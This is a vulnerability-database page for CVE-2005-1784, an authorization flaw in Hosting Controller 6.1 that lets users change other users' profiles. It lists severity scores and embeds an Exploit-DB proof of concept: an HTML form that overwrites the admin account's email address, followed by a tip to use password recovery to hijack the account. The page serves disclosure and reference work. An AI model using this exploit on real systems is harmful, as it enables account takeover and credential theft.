CVE-2005-1784 : Detail

CVE-2005-1784

2.12%V3
Network
2005-05-31
04h00 +00:00
2024-09-17
00h21 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Hosting Controller 6.1 HotFix 2.0 and earlier allows remote attackers to steal passwords and gain privileges via a modified emailaddress parameter in an updateprofile action for UserProfile.asp.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1015

Publication date : 2005-05-26 22h00 +00:00
Author : Soroush Dalili
EDB Verified : Yes

<!-- Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group). Title: Hosting controller program have a security bug in "UserProfile.asp" that an authenticated user can change other's profiles. Why is it dangerous: a user can change other's email address and then use forgot password to recieve their password! also he/she can gain administrator password by this way! Version: 6.1 HotFix 2.0 and older Developer url: hostingcontroller.com Comment: Hosting Controller is an application to manage a host. Exploit code to proof: -------------------------------- Change users profiles: --> <form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post"> Username : <input name="UserList" value="hcadmin" type="text" size="50"> <br> emailaddress : <input name="emailaddress" value="[email protected]" type="text" size="50"> <br> firstname : <input name="firstname" value="Crkchat" type="text" size="50"> <br> <input name="submit" value="submit" type="submit"> </form> <!-- ----------------------------------- Now u can use forgot password to gain passwords! --> # milw0rm.com [2005-05-27]

Products Mentioned

Configuraton 0

Hosting_controller>>Hosting_controller >> Version To (including) 6.1_hotfix_2.0

    References

    http://securitytracker.com/id?1014062
    Tags : vdb-entry, x_refsource_SECTRACK